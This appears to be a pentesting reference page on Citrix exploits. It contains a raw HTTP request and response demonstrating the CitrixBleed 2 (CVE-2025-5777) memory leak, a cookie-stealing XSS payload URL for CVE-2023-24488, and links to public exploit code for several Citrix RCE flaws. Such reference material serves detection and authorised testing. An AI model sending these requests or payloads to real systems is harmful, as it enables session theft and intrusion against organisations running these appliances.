Citrix

Citrix Exploit

CitrixBleed 2 - CVE-2025-5777

Citrix Netscaler Memory Disclosure

How Much More Must We Bleed? - Citrix NetScaler Memory Disclosure (CitrixBleed 2 CVE-2025-5777)watchTowr Labs

Detection

POST /p/u/doAuthentication.do HTTP/1.0
Host: target
User-Agent: watchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowr
Content-Length: 5
Connection: keep-alive

login

Response:

HTTP/1.1 200 OK
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 1962
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/vnd.citrix.authenticateresponse-1+xml; charset=utf-8
X-Citrix-Application: Receiver for Web

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<AuthenticateResponse
	xmlns="<http://citrix.com/authentication/response/1>">
	<Status>success</Status>
	<Result>more-info</Result>
	<StateContext>bG9naW5zY2hlbWE9ZGVmYXVsdA==</StateContext>
	<AuthenticationRequirements>
		<PostBack>/p/u/doAuthentication.do</PostBack>
		<CancelPostBack>/p/u/doLogoff.do</CancelPostBack>
		<CancelButtonText>Cancel</CancelButtonText>
		<Requirements>
			<Requirement>
				<Credential>
					<Type>none</Type>
				</Credential>
				<Label>
					<Type>nsg-login-heading</Type>
					<Text>nsg_loginHeading</Text>
				</Label>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>login</ID>
					<SaveID>login</SaveID>
					<Type>username</Type>
				</Credential>
				<Label>
					<Text>nsg_username</Text>
					<Type>nsg-login-label</Type>
				</Label>
				<Input>
					<Text>
						<ReadOnly>false</ReadOnly>
						<InitialValue>É|¼Cž÷PkÓßYsa5ÊÞÅЭ^šÐ”|@º‹JŸZõ¶@”¹^ì¶Uã™7K›èg ­Oë@’¼~hL1{Xövn^›ÐÛ·˜¹ƒ˜8dp}°$€üüŒÇ)7
(÷挾èÂpAgc¼TowrwatchTowrw</InitialValue>
						<Constraint>.+</Constraint>
					</Text>
				</Input>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>passwd</ID>
					<SaveID>passwd</SaveID>
					<Type>password</Type>
				</Credential>
				<Label>
					<Text>nsg_password1</Text>
					<Type>nsg-login-label</Type>
				</Label>
				<Input>
					<Text>
						<Secret>true</Secret>
						<Constraint>.+</Constraint>
					</Text>
				</Input>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>savecredentials</ID>
					<SaveID></SaveID>
					<Type>savecredentials</Type>
				</Credential>
				<Label>
					<Text>Remember my credentials</Text>
					<Type>plain</Type>
				</Label>
				<Input>
					<AssistiveText></AssistiveText>
					<CheckBox>
						<InitialValue>false</InitialValue>
					</CheckBox>
				</Input>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>nsg-x1-logon-button</ID>
					<Type>none</Type>
				</Credential>
				<Input>
					<Button>Log On</Button>
				</Input>
				<Label>
					<Type/>
				</Label>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>l20n-error</ID>
					<SaveID></SaveID>
					<Type>none</Type>
				</Credential>
				<Label>
					<Text>Try again after some time or contact your help desk</Text>
					<Type>nsg-l20n-error</Type>
				</Label>
				<Input/>
			</Requirement>
		</Requirements>
	</AuthenticationRequirements>
</AuthenticateResponse>

PoC

GitHub - win3zz/CVE-2025-5777: CVE-2025-5777 (CitrixBleed 2) - Critical memory leak vulnerability affecting Citrix NetScaler ADC and Gateway devicesGitHub

CVE-2024-xxxx - Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE

GitHub - watchtowrlabs/Citrix-Virtual-Apps-XEN-Exploit: Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCEGitHub

CVE-2024-8068 and CVE-2024-8069

GitHub - XiaomingX/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN: Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCEGitHub

CVE-2023-4966 - Citrix Bleed: Leaking Session Tokens

exploits/citrix/CVE-2023-4966/exploit.py at main · assetnote/exploitsGitHub

CVE-2023-24488

XSS and Open Redirec in Citrix ADC and Citrix Gateway

GitHub - securitycipher/CVE-2023-24488: POC for CVE-2023-24488GitHub

PoC:

/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E

Nuclei Template:

nuclei-templates/CVE-2023-24488.yaml at master · k00kx/nuclei-templatesGitHub

CVE-2023-3519 - Citrix ADC RCE

Citrix VPX 13.1-48.47

GitHub - BishopFox/CVE-2023-3519: RCE exploit for CVE-2023-3519GitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.